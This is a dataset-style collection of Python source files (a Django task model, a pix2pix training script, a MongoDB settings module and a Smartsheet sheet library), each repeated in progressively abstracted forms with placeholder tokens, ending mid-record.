"\"\"\"-\"\"\"\n\nSETTINGS = {\n 'logging': {\n 'level': 'WARN'\n }\n}\n",
"<docstring token>\nSETTINGS = {'logging': {'level': 'WARN'}}\n",
"<docstring token>\n<assignment token>\n"
] | false |
99,847 | 4a82d5c383d0ac51b3579d3cee1ecdd53c0879db | from django.db import models
import uuid
class Task(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
goal = models.CharField(max_length = 255)
deadline = models.DateField()
payment = models.PositiveIntegerField()
user_name = models.CharField(max_length=255, default='')
user_email = models.EmailField()
verificator_name = models.CharField(max_length=255, default='')
verificator_email = models.EmailField()
verified = models.BooleanField(default = False)
closed = models.BooleanField(default=False)
paid = models.BooleanField(default=False)
#card_info
def __str__(self):
return f'Goal: {self.goal}, user: {self.user_email}'
| [
"from django.db import models\n\nimport uuid\n\n\nclass Task(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n goal = models.CharField(max_length = 255)\n deadline = models.DateField()\n payment = models.PositiveIntegerField()\n user_name = models.CharField(max_length=255, default='')\n user_email = models.EmailField()\n verificator_name = models.CharField(max_length=255, default='')\n verificator_email = models.EmailField()\n verified = models.BooleanField(default = False)\n closed = models.BooleanField(default=False)\n paid = models.BooleanField(default=False)\n #card_info\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n\n",
"from django.db import models\nimport uuid\n\n\nclass Task(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n goal = models.CharField(max_length=255)\n deadline = models.DateField()\n payment = models.PositiveIntegerField()\n user_name = models.CharField(max_length=255, default='')\n user_email = models.EmailField()\n verificator_name = models.CharField(max_length=255, default='')\n verificator_email = models.EmailField()\n verified = models.BooleanField(default=False)\n closed = models.BooleanField(default=False)\n paid = models.BooleanField(default=False)\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n",
"<import token>\n\n\nclass Task(models.Model):\n id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)\n goal = models.CharField(max_length=255)\n deadline = models.DateField()\n payment = models.PositiveIntegerField()\n user_name = models.CharField(max_length=255, default='')\n user_email = models.EmailField()\n verificator_name = models.CharField(max_length=255, default='')\n verificator_email = models.EmailField()\n verified = models.BooleanField(default=False)\n closed = models.BooleanField(default=False)\n paid = models.BooleanField(default=False)\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n",
"<import token>\n\n\nclass Task(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __str__(self):\n return f'Goal: {self.goal}, user: {self.user_email}'\n",
"<import token>\n\n\nclass Task(models.Model):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n",
"<import token>\n<class token>\n"
] | false |
99,848 | f98b78f2e0fbf87e11e3783dc8422f45641cfd59 | from datasets import get_colorize_w_train_dataset, get_colorize_w_test_dataset
from pix2pix_training import training_session
if __name__ == "__main__":
train_ds = get_colorize_w_train_dataset()
test_ds = get_colorize_w_test_dataset()
fit = training_session("_colorize_w")
fit(
train_ds, 150, test_ds,
)
| [
"from datasets import get_colorize_w_train_dataset, get_colorize_w_test_dataset\nfrom pix2pix_training import training_session\n\nif __name__ == \"__main__\":\n train_ds = get_colorize_w_train_dataset()\n test_ds = get_colorize_w_test_dataset()\n\n fit = training_session(\"_colorize_w\")\n fit(\n train_ds, 150, test_ds,\n )\n\n",
"from datasets import get_colorize_w_train_dataset, get_colorize_w_test_dataset\nfrom pix2pix_training import training_session\nif __name__ == '__main__':\n train_ds = get_colorize_w_train_dataset()\n test_ds = get_colorize_w_test_dataset()\n fit = training_session('_colorize_w')\n fit(train_ds, 150, test_ds)\n",
"<import token>\nif __name__ == '__main__':\n train_ds = get_colorize_w_train_dataset()\n test_ds = get_colorize_w_test_dataset()\n fit = training_session('_colorize_w')\n fit(train_ds, 150, test_ds)\n",
"<import token>\n<code token>\n"
] | false |
99,849 | 147520c7d23c0f4acb305afe665d014bc97f046d | #-*- coding: utf8 -*-
#IS_TEST
IS_TEST = False#是否测试
#mongo conn settings
mongo_ip = '10.245.146.37'
mongo_db_name = 'idomains_mine'
mongo_db_name_samples = 'domain_set'
mongo_clusters_table = "clusters"
mongo_similar_domains_table = 'similar_domains'
#exper samples file name
samples_file_name = 'exper_file/www577789.com_sample.pkl'
#tld list file name
tld_list_fn = 'SDM/req_file/tld_list.pkl'
#dns server file name
dns_server_file_name = 'SDM/req_file/dns_servers.txt' | [
"#-*- coding: utf8 -*-\n#IS_TEST\nIS_TEST = False#是否测试\n\n#mongo conn settings\nmongo_ip = '10.245.146.37'\nmongo_db_name = 'idomains_mine'\nmongo_db_name_samples = 'domain_set'\nmongo_clusters_table = \"clusters\"\nmongo_similar_domains_table = 'similar_domains'\n\n#exper samples file name\nsamples_file_name = 'exper_file/www577789.com_sample.pkl'\n#tld list file name\ntld_list_fn = 'SDM/req_file/tld_list.pkl'\n#dns server file name\ndns_server_file_name = 'SDM/req_file/dns_servers.txt'",
"IS_TEST = False\nmongo_ip = '10.245.146.37'\nmongo_db_name = 'idomains_mine'\nmongo_db_name_samples = 'domain_set'\nmongo_clusters_table = 'clusters'\nmongo_similar_domains_table = 'similar_domains'\nsamples_file_name = 'exper_file/www577789.com_sample.pkl'\ntld_list_fn = 'SDM/req_file/tld_list.pkl'\ndns_server_file_name = 'SDM/req_file/dns_servers.txt'\n",
"<assignment token>\n"
] | false |
99,850 | f96ec3a5ecd56028852601487f27a9af0de68bed | # -*- coding: utf-8 -*-
v=(2)//-8
print(v)
| [
"# -*- coding: utf-8 -*-\n\nv=(2)//-8\nprint(v)\n \n",
"v = 2 // -8\nprint(v)\n",
"<assignment token>\nprint(v)\n",
"<assignment token>\n<code token>\n"
] | false |
99,851 | 5bdfcd6a641c8e259212d6194309854b5b1f5b2a | import logging
from datetime import datetime
from typing import (
Optional,
Dict,
List,
ClassVar,
Generic,
Type,
TypeVar,
Tuple,
Any,
Union,
cast,
TYPE_CHECKING,
)
import attr
from marshmallow import fields, pre_load
from simple_smartsheet import config
from simple_smartsheet import exceptions
from simple_smartsheet import utils
from simple_smartsheet.types import IndexKeysDict, IndexesType
from simple_smartsheet.models.base import Schema, CoreSchema, Object, CoreObject
from simple_smartsheet.models.cell import Cell
from simple_smartsheet.models.column import Column, ColumnSchema, ColumnType
from simple_smartsheet.models.row import Row, RowSchema, _RowBase
if TYPE_CHECKING:
try:
import pandas as pd
except ImportError:
pass
logger = logging.getLogger(__name__)
class UserSettingsSchema(Schema):
critical_path_enabled = fields.Bool(data_key="criticalPathEnabled")
display_summary_tasks = fields.Bool(data_key="displaySummaryTasks")
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class UserSettings(Object):
critical_path_enabled: bool
display_summary_tasks: bool
class UserPermissionsSchema(Schema):
summary_permissions = fields.Str(data_key="summaryPermissions")
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class UserPermissions(Object):
summary_permissions: str
class WorkspaceSchema(Schema):
id = fields.Int()
name = fields.Str()
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class Workspace(Object):
id: int
name: str
class SheetSchema(CoreSchema):
"""Marshmallow Schema for Smartsheet Sheet object
Additional details about fields can be found here:
http://smartsheet-platform.github.io/api-docs/#sheets
"""
id = fields.Int()
name = fields.Str()
access_level = fields.Str(data_key="accessLevel")
permalink = fields.Str()
favorite = fields.Bool()
created_at = fields.DateTime(data_key="createdAt")
modified_at = fields.DateTime(data_key="modifiedAt")
version = fields.Int()
total_row_count = fields.Int(data_key="totalRowCount")
effective_attachment_options = fields.List(
fields.Str(), data_key="effectiveAttachmentOptions"
)
gantt_enabled = fields.Bool(data_key="ganttEnabled")
read_only = fields.Bool(data_key="readOnly")
dependencies_enabled = fields.Bool(data_key="dependenciesEnabled")
resource_management_enabled = fields.Bool(data_key="resourceManagementEnabled")
cell_image_upload_enabled = fields.Bool(data_key="cellImageUploadEnabled")
user_settings = fields.Nested(UserSettingsSchema, data_key="userSettings")
user_permissions = fields.Nested(UserPermissionsSchema, data_key="userPermissions")
has_summary_fields = fields.Bool(data_key="hasSummaryFields")
is_multi_picklist_enabled = fields.Bool(data_key="isMultiPicklistEnabled")
columns = fields.List(fields.Nested(ColumnSchema))
rows = fields.List(fields.Nested(RowSchema))
workspace = fields.Nested(WorkspaceSchema)
class Meta:
unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)
ordered = True
@pre_load
def update_context(self, data, many: bool, **kwargs):
self.context["column_id_to_type"] = {}
return data
RowT = TypeVar("RowT", bound=_RowBase[Any])
ColumnT = TypeVar("ColumnT", bound=Column)
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class _SheetBase(CoreObject, Generic[RowT, ColumnT]):
"""Represents Smartsheet Sheet object
Additional details about fields can be found here:
http://smartsheet-platform.github.io/api-docs/#sheets
Extra attributes:
indexes: contains all built indices
"""
name: str
id: Optional[int] = None
access_level: Optional[str] = None
permalink: Optional[str] = None
favorite: Optional[bool] = None
created_at: Optional[datetime] = None
modified_at: Optional[datetime] = None
version: Optional[int] = None
total_row_count: Optional[int] = None
effective_attachment_options: List[str] = attr.Factory(list)
gantt_enabled: Optional[bool] = None
read_only: Optional[bool] = None
dependencies_enabled: Optional[bool] = None
resource_management_enabled: Optional[bool] = None
cell_image_upload_enabled: Optional[bool] = None
user_settings: Optional[UserSettings] = None
user_permissions: Optional[UserPermissions] = None
has_summary_fields: Optional[bool] = None
is_multi_picklist_enabled: Optional[bool] = None
columns: List[ColumnT] = attr.Factory(list)
rows: List[RowT] = attr.Factory(list)
workspace: Optional[Workspace] = None
_row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)
_row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)
_column_title_to_column: Dict[str, ColumnT] = attr.ib(
attr.Factory(dict), init=False
)
_column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict), init=False)
indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)
_schema: ClassVar[Type[SheetSchema]] = SheetSchema
def __attrs_post_init__(self) -> None:
self._update_column_lookup()
self._update_row_cell_lookup()
def _update_column_lookup(self) -> None:
self._column_title_to_column.clear()
self._column_id_to_column.clear()
for column in self.columns:
column_id = column._id
if column_id is None:
continue
self._column_id_to_column[column_id] = column
column_title = column.title
if column_title is None:
continue
if column_title in self._column_title_to_column:
logger.info(
"Column with the title %s is already present in the index",
column_title,
)
self._column_title_to_column[column_title] = column
def _update_row_cell_lookup(self) -> None:
self._row_num_to_row.clear()
self._row_id_to_row.clear()
for row in self.rows:
if row.num:
self._row_num_to_row[row.num] = row
if row.id:
self._row_id_to_row[row.id] = row
row._update_cell_lookup(self)
def build_index(self, indexes: List[IndexKeysDict]) -> None:
for index in indexes:
columns = index["columns"]
unique = index["unique"]
self.indexes[columns] = {"index": {}, "unique": unique}
for row in self.rows:
row._update_index(self)
def get_row(
self,
row_num: Optional[int] = None,
row_id: Optional[int] = None,
filter: Optional[Dict[str, Any]] = None,
) -> Optional[RowT]:
"""Returns Row object by row number or ID
Either row_num or row_id must be provided
Args:
row_num: row number
row_id: row id
filter: a dictionary with column title to value
mappings in the same order as index was built. Index must be unique.
Returns:
Row object
"""
if row_num is not None:
return self._row_num_to_row.get(row_num)
elif row_id is not None:
return self._row_id_to_row.get(row_id)
elif filter is not None:
columns, query = zip(*sorted(filter.items()))
index_dict = self.indexes.get(columns)
if index_dict is None:
raise exceptions.SmartsheetIndexNotFound(
f"Index {columns} is not found, "
f"build it first with build_index method"
)
unique = index_dict["unique"]
if not unique:
raise exceptions.SmartsheetIndexNotUnique(
f"Index {columns} is non-unique and lookup will potentially "
"return multiple rows, use get_rows method instead"
)
index = cast(Dict[Tuple[Any, ...], RowT], index_dict["index"])
return index[query]
else:
raise ValueError("Either row_num or row_id argument should be provided")
def get_rows(self, filter: Dict[str, Any]) -> List[RowT]:
"""Returns Row objects by index query
Args:
filter: a dictionary or ordered dictionary with column title to value
mappings in the same order as index was built. Index must be non-unique.
Returns:
Row object
"""
columns, query = zip(*sorted(filter.items()))
index_dict = self.indexes.get(columns)
if index_dict is None:
raise exceptions.SmartsheetIndexNotFound(
f"Index {columns} is not found, "
f"build it first with build_index method"
)
unique = index_dict["unique"]
if unique:
unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict["index"])
result = unique_index.get(query)
if result is not None:
return [result]
else:
return []
else:
non_unique_index = cast(
Dict[Tuple[Any, ...], List[RowT]], index_dict["index"]
)
return non_unique_index.get(query, [])
def get_column(
self, column_title: Optional[str] = None, column_id: Optional[int] = None
) -> ColumnT:
"""Returns Column object by column title or ID
Either column_title or column_id must be provided
Args:
column_title: column title (case-sensitive)
column_id: column id
Returns:
Column object
"""
if column_title is not None:
return self._column_title_to_column[column_title]
elif column_id is not None:
return self._column_id_to_column[column_id]
else:
raise ValueError(
"Either column_title or column_id argument should be provided"
)
def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:
"""Returns a list of dictionaries with column titles and cell values"""
return [row.as_dict() for row in self.rows]
@attr.s(auto_attribs=True, repr=False, kw_only=True)
class Sheet(_SheetBase[Row, Column]):
columns: List[Column] = cast(List[Column], attr.Factory(list))
rows: List[Row] = attr.Factory(list)
def make_cell(self, column_title: str, field_value: Any) -> Cell:
"""Creates a Cell object for an existing column
Args:
column_title: title of an existing column
field_value: value of the cell
Returns:
Cell object
"""
column = self.get_column(column_title)
if column is None:
raise ValueError(
"A column with the title %s does not exist in this sheet", column_title
)
if column.type == ColumnType.MULTI_PICKLIST:
if not column.id:
raise ValueError(f"Column {column!r} does not have ID")
cell = Cell.create_multi_picklist(column_id=column.id, values=field_value)
else:
cell = Cell(column_id=column.id, value=field_value)
return cell
def make_cells(self, fields: Dict[str, Any]) -> List[Cell]:
"""Create a list of Cell objects from dictionary
Args:
fields: dictionary where key is a column title and value is a cell value
Returns:
list of Cell objects
"""
result: List[Cell] = []
for column_title, field_value in fields.items():
result.append(self.make_cell(column_title, field_value))
return result
def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:
"""Returns a list of dictionaries with column titles and cell values"""
return [row.as_dict() for row in self.rows]
def as_dataframe(self) -> "pd.DataFrame":
"""Return the sheet as pandas DataFrame
Columns will includes row id, row number and all columns from the sheet
Pandas must be installed either separately or as extras:
`pip install simple-smartsheet[pandas]`
"""
import pandas as pd
df = pd.DataFrame([row.as_series() for row in self.rows])
return df
| [
"import logging\nfrom datetime import datetime\nfrom typing import (\n Optional,\n Dict,\n List,\n ClassVar,\n Generic,\n Type,\n TypeVar,\n Tuple,\n Any,\n Union,\n cast,\n TYPE_CHECKING,\n)\n\nimport attr\nfrom marshmallow import fields, pre_load\n\nfrom simple_smartsheet import config\nfrom simple_smartsheet import exceptions\nfrom simple_smartsheet import utils\nfrom simple_smartsheet.types import IndexKeysDict, IndexesType\nfrom simple_smartsheet.models.base import Schema, CoreSchema, Object, CoreObject\nfrom simple_smartsheet.models.cell import Cell\nfrom simple_smartsheet.models.column import Column, ColumnSchema, ColumnType\nfrom simple_smartsheet.models.row import Row, RowSchema, _RowBase\n\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\n\nlogger = logging.getLogger(__name__)\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key=\"criticalPathEnabled\")\n display_summary_tasks = fields.Bool(data_key=\"displaySummaryTasks\")\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key=\"summaryPermissions\")\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key=\"accessLevel\")\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key=\"createdAt\")\n modified_at = fields.DateTime(data_key=\"modifiedAt\")\n\n version = fields.Int()\n total_row_count = fields.Int(data_key=\"totalRowCount\")\n effective_attachment_options = fields.List(\n fields.Str(), data_key=\"effectiveAttachmentOptions\"\n )\n gantt_enabled = fields.Bool(data_key=\"ganttEnabled\")\n read_only = fields.Bool(data_key=\"readOnly\")\n dependencies_enabled = fields.Bool(data_key=\"dependenciesEnabled\")\n resource_management_enabled = fields.Bool(data_key=\"resourceManagementEnabled\")\n cell_image_upload_enabled = fields.Bool(data_key=\"cellImageUploadEnabled\")\n user_settings = fields.Nested(UserSettingsSchema, data_key=\"userSettings\")\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\"userPermissions\")\n has_summary_fields = fields.Bool(data_key=\"hasSummaryFields\")\n is_multi_picklist_enabled = fields.Bool(data_key=\"isMultiPicklistEnabled\")\n\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context[\"column_id_to_type\"] = {}\n return data\n\n\nRowT = TypeVar(\"RowT\", bound=_RowBase[Any])\nColumnT = TypeVar(\"ColumnT\", bound=Column)\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(\n attr.Factory(dict), init=False\n )\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict), init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) -> None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) -> None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n \"Column with the title %s is already present in the index\",\n column_title,\n )\n self._column_title_to_column[column_title] = column\n\n def _update_row_cell_lookup(self) -> None:\n self._row_num_to_row.clear()\n self._row_id_to_row.clear()\n\n for row in self.rows:\n if row.num:\n self._row_num_to_row[row.num] = row\n\n if row.id:\n self._row_id_to_row[row.id] = row\n\n row._update_cell_lookup(self)\n\n def build_index(self, indexes: List[IndexKeysDict]) -> None:\n for index in indexes:\n columns = index[\"columns\"]\n unique = index[\"unique\"]\n self.indexes[columns] = {\"index\": {}, \"unique\": unique}\n\n for row in self.rows:\n row._update_index(self)\n\n def get_row(\n self,\n row_num: Optional[int] = None,\n row_id: Optional[int] = None,\n filter: Optional[Dict[str, Any]] = None,\n ) -> Optional[RowT]:\n \"\"\"Returns Row object by row number or ID\n\n Either row_num or row_id must be provided\n\n Args:\n row_num: row number\n row_id: row id\n filter: a dictionary with column title to value\n mappings in the same order as index was built. Index must be unique.\n\n Returns:\n Row object\n \"\"\"\n if row_num is not None:\n return self._row_num_to_row.get(row_num)\n elif row_id is not None:\n return self._row_id_to_row.get(row_id)\n elif filter is not None:\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f\"Index {columns} is not found, \"\n f\"build it first with build_index method\"\n )\n\n unique = index_dict[\"unique\"]\n if not unique:\n raise exceptions.SmartsheetIndexNotUnique(\n f\"Index {columns} is non-unique and lookup will potentially \"\n \"return multiple rows, use get_rows method instead\"\n )\n index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\"index\"])\n return index[query]\n else:\n raise ValueError(\"Either row_num or row_id argument should be provided\")\n\n def get_rows(self, filter: Dict[str, Any]) -> List[RowT]:\n \"\"\"Returns Row objects by index query\n\n Args:\n filter: a dictionary or ordered dictionary with column title to value\n mappings in the same order as index was built. Index must be non-unique.\n\n Returns:\n Row object\n \"\"\"\n columns, query = zip(*sorted(filter.items()))\n index_dict = self.indexes.get(columns)\n if index_dict is None:\n raise exceptions.SmartsheetIndexNotFound(\n f\"Index {columns} is not found, \"\n f\"build it first with build_index method\"\n )\n\n unique = index_dict[\"unique\"]\n if unique:\n unique_index = cast(Dict[Tuple[Any, ...], RowT], index_dict[\"index\"])\n result = unique_index.get(query)\n if result is not None:\n return [result]\n else:\n return []\n else:\n non_unique_index = cast(\n Dict[Tuple[Any, ...], List[RowT]], index_dict[\"index\"]\n )\n return non_unique_index.get(query, [])\n\n def get_column(\n self, column_title: Optional[str] = None, column_id: Optional[int] = None\n ) -> ColumnT:\n \"\"\"Returns Column object by column title or ID\n\n Either column_title or column_id must be provided\n\n Args:\n column_title: column title (case-sensitive)\n column_id: column id\n\n Returns:\n Column object\n \"\"\"\n if column_title is not None:\n return self._column_title_to_column[column_title]\n elif column_id is not None:\n return self._column_id_to_column[column_id]\n else:\n raise ValueError(\n \"Either column_title or column_id argument should be provided\"\n )\n\n def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Sheet(_SheetBase[Row, Column]):\n columns: List[Column] = cast(List[Column], attr.Factory(list))\n rows: List[Row] = attr.Factory(list)\n\n def make_cell(self, column_title: str, field_value: Any) -> Cell:\n \"\"\"Creates a Cell object for an existing column\n\n Args:\n column_title: title of an existing column\n field_value: value of the cell\n\n Returns:\n Cell object\n \"\"\"\n column = self.get_column(column_title)\n if column is None:\n raise ValueError(\n \"A column with the title %s does not exist in this sheet\", column_title\n )\n if column.type == ColumnType.MULTI_PICKLIST:\n if not column.id:\n raise ValueError(f\"Column {column!r} does not have ID\")\n cell = Cell.create_multi_picklist(column_id=column.id, values=field_value)\n else:\n cell = Cell(column_id=column.id, value=field_value)\n return cell\n\n def make_cells(self, fields: Dict[str, Any]) -> List[Cell]:\n \"\"\"Create a list of Cell objects from dictionary\n\n Args:\n fields: dictionary where key is a column title and value is a cell value\n\n Returns:\n list of Cell objects\n \"\"\"\n result: List[Cell] = []\n for column_title, field_value in fields.items():\n result.append(self.make_cell(column_title, field_value))\n return result\n\n def as_list(self) -> List[Dict[str, Union[float, str, datetime, None]]]:\n \"\"\"Returns a list of dictionaries with column titles and cell values\"\"\"\n return [row.as_dict() for row in self.rows]\n\n def as_dataframe(self) -> \"pd.DataFrame\":\n \"\"\"Return the sheet as pandas DataFrame\n\n Columns will includes row id, row number and all columns from the sheet\n Pandas must be installed either separately or as extras:\n `pip install simple-smartsheet[pandas]`\n \"\"\"\n import pandas as pd\n\n df = pd.DataFrame([row.as_series() for row in self.rows])\n return df\n",
"import logging\nfrom datetime import datetime\nfrom typing import Optional, Dict, List, ClassVar, Generic, Type, TypeVar, Tuple, Any, Union, cast, TYPE_CHECKING\nimport attr\nfrom marshmallow import fields, pre_load\nfrom simple_smartsheet import config\nfrom simple_smartsheet import exceptions\nfrom simple_smartsheet import utils\nfrom simple_smartsheet.types import IndexKeysDict, IndexesType\nfrom simple_smartsheet.models.base import Schema, CoreSchema, Object, CoreObject\nfrom simple_smartsheet.models.cell import Cell\nfrom simple_smartsheet.models.column import Column, ColumnSchema, ColumnType\nfrom simple_smartsheet.models.row import Row, RowSchema, _RowBase\nif TYPE_CHECKING:\n try:\n import pandas as pd\n except ImportError:\n pass\nlogger = logging.getLogger(__name__)\n\n\nclass UserSettingsSchema(Schema):\n critical_path_enabled = fields.Bool(data_key='criticalPathEnabled')\n display_summary_tasks = fields.Bool(data_key='displaySummaryTasks')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserSettings(Object):\n critical_path_enabled: bool\n display_summary_tasks: bool\n\n\nclass UserPermissionsSchema(Schema):\n summary_permissions = fields.Str(data_key='summaryPermissions')\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass UserPermissions(Object):\n summary_permissions: str\n\n\nclass WorkspaceSchema(Schema):\n id = fields.Int()\n name = fields.Str()\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass Workspace(Object):\n id: int\n name: str\n\n\nclass SheetSchema(CoreSchema):\n \"\"\"Marshmallow Schema for Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n \"\"\"\n id = fields.Int()\n name = fields.Str()\n access_level = fields.Str(data_key='accessLevel')\n permalink = fields.Str()\n favorite = fields.Bool()\n created_at = fields.DateTime(data_key='createdAt')\n modified_at = fields.DateTime(data_key='modifiedAt')\n version = fields.Int()\n total_row_count = fields.Int(data_key='totalRowCount')\n effective_attachment_options = fields.List(fields.Str(), data_key=\n 'effectiveAttachmentOptions')\n gantt_enabled = fields.Bool(data_key='ganttEnabled')\n read_only = fields.Bool(data_key='readOnly')\n dependencies_enabled = fields.Bool(data_key='dependenciesEnabled')\n resource_management_enabled = fields.Bool(data_key=\n 'resourceManagementEnabled')\n cell_image_upload_enabled = fields.Bool(data_key='cellImageUploadEnabled')\n user_settings = fields.Nested(UserSettingsSchema, data_key='userSettings')\n user_permissions = fields.Nested(UserPermissionsSchema, data_key=\n 'userPermissions')\n has_summary_fields = fields.Bool(data_key='hasSummaryFields')\n is_multi_picklist_enabled = fields.Bool(data_key='isMultiPicklistEnabled')\n columns = fields.List(fields.Nested(ColumnSchema))\n rows = fields.List(fields.Nested(RowSchema))\n workspace = fields.Nested(WorkspaceSchema)\n\n\n class Meta:\n unknown = utils.get_unknown_field_handling(config.STRICT_VALIDATION)\n ordered = True\n\n @pre_load\n def update_context(self, data, many: bool, **kwargs):\n self.context['column_id_to_type'] = {}\n return data\n\n\nRowT = TypeVar('RowT', bound=_RowBase[Any])\nColumnT = TypeVar('ColumnT', bound=Column)\n\n\[email protected](auto_attribs=True, repr=False, kw_only=True)\nclass _SheetBase(CoreObject, Generic[RowT, ColumnT]):\n \"\"\"Represents Smartsheet Sheet object\n\n Additional details about fields can be found here:\n http://smartsheet-platform.github.io/api-docs/#sheets\n\n Extra attributes:\n indexes: contains all built indices\n \"\"\"\n name: str\n id: Optional[int] = None\n access_level: Optional[str] = None\n permalink: Optional[str] = None\n favorite: Optional[bool] = None\n created_at: Optional[datetime] = None\n modified_at: Optional[datetime] = None\n version: Optional[int] = None\n total_row_count: Optional[int] = None\n effective_attachment_options: List[str] = attr.Factory(list)\n gantt_enabled: Optional[bool] = None\n read_only: Optional[bool] = None\n dependencies_enabled: Optional[bool] = None\n resource_management_enabled: Optional[bool] = None\n cell_image_upload_enabled: Optional[bool] = None\n user_settings: Optional[UserSettings] = None\n user_permissions: Optional[UserPermissions] = None\n has_summary_fields: Optional[bool] = None\n is_multi_picklist_enabled: Optional[bool] = None\n columns: List[ColumnT] = attr.Factory(list)\n rows: List[RowT] = attr.Factory(list)\n workspace: Optional[Workspace] = None\n _row_num_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _row_id_to_row: Dict[int, RowT] = attr.ib(attr.Factory(dict), init=False)\n _column_title_to_column: Dict[str, ColumnT] = attr.ib(attr.Factory(dict\n ), init=False)\n _column_id_to_column: Dict[int, ColumnT] = attr.ib(attr.Factory(dict),\n init=False)\n indexes: IndexesType = attr.ib(attr.Factory(dict), init=False)\n _schema: ClassVar[Type[SheetSchema]] = SheetSchema\n\n def __attrs_post_init__(self) ->None:\n self._update_column_lookup()\n self._update_row_cell_lookup()\n\n def _update_column_lookup(self) ->None:\n self._column_title_to_column.clear()\n self._column_id_to_column.clear()\n for column in self.columns:\n column_id = column._id\n if column_id is None:\n continue\n self._column_id_to_column[column_id] = column\n column_title = column.title\n if column_title is None:\n continue\n if column_title in self._column_title_to_column:\n logger.info(\n 'Column with the title %s is already present in the index',\n column_title)\n 